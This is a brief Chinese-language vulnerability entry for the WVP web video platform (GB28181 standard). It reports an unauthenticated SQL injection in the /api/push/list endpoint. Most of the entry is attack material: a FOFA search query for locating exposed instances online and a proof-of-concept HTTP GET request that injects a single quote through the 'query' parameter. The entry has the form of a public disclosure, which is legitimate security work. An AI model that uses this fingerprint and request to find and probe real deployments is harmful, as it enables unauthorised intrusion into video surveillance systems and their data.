漏洞描述
WVP(WEB VIDEO PLATFORM是)是一个基于GB28181-2016标准实现的网络视频平台,WVP视频平台(国标28181)未授权接口/api/push/list存在SQL注入漏洞
# WVP视频平台(国标28181)未授权SQL注入漏洞
WVP视频平台(国标28181)未授权接口/api/push/list存在SQL注入漏洞
## fofa
```yaml
body="国标28181"
```
## poc
```
GET /api/push/list?page=1&count=15&query=1'&pushing=&mediaServerId= HTTP/1.1
Host:
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: close
```
